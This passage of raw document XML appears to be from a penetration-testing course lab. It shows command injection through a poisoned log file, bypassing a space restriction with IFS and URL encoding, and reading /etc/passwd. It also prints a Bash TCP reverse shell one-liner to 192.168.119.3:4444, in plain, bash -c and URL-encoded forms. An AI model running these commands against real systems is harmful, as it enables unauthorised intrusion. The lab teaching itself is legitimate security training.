      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file due to our poisoning with the PHP code snippet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D65">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's update the command parameter with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 11: Using a command with parameters" id="57" name="image62.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 11: Using a command with parameters" id="0" name="image62.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId593"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 11: Using a command with parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D67">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section shows that our input triggers an error. This happens due to the space between the command and the parameters. There are different techniques we can use to bypass this limitation, such as using</w:t>
      </w:r>
      <w:hyperlink r:id="rId594">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId595">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Input Field Separators</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IFS) or</w:t>
      </w:r>
      <w:hyperlink r:id="rId596">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId597">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With IFS, we can change how a space is interpreted. as shown here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D69">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IFS=' '  # Set IFS to space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">input="cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read -r cmd arg &lt;&lt;&lt; "$input"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$cmd $arg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 16 - IFS Example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D71">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This takes the string and splits it based on the IFS. We can then run those commands without using the space character. With URLencoding, a space is represented as "%20". Let's do that now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D72">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's replace the space with "%20" and press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 12: URL encoding a space with %20" id="407" name="image413.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 12: URL encoding a space with %20" id="0" name="image413.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId598"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 12: URL encoding a space with %20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D74">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12 shows that our command executed correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D75">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have achieved command execution on the target system and can leverage this to get a reverse shell or add our SSH key to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file for a user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D76">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's attempt to obtain a reverse shell by adding a command to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. We can use a common</w:t>
      </w:r>
      <w:hyperlink r:id="rId599">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId600">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bash TCP reverse shell one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The target IP for the reverse shell may need to be updated in the labs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D77">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D78">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/192.168.119.3/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 17 - Bash reverse shell one-liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we'll execute our command through the PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, we should be aware that the command may be executed via the</w:t>
      </w:r>
      <w:hyperlink r:id="rId601">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId602">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bourne Shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, also known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than Bash. The reverse shell one-liner in Listing 17 contains syntax that is not supported by the Bourne Shell. To ensure the reverse shell is executed via Bash, we need to modify the reverse shell command. We can do this by providing the reverse shell one-liner as argument to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which executes a command with Bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/192.168.119.3/4444 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 18 - Bash reverse shell one-liner executed as command in Bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll once again encode the special characters with URL encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D7F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 19 - URL encoded Bash TCP reverse shell one-liner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D82">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following figure shows the correct way to add our command in the request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2895600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 13: Encoded Bash reverse shell in " id="337" name="image326.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 13: Encoded Bash reverse shell in " id="0" name="image326.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId603"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2895600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 13: Encoded Bash reverse shell in "cmd" parameter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D84">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we send the request, let's start a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on port 4444 on our Kali machine. It will receive the incoming reverse shell from the target system. Once the listener is started, we can press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp to send the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D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87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D88">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fp2fnkdwx29" w:id="243"/>
      <w:bookmarkEnd w:id="243"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
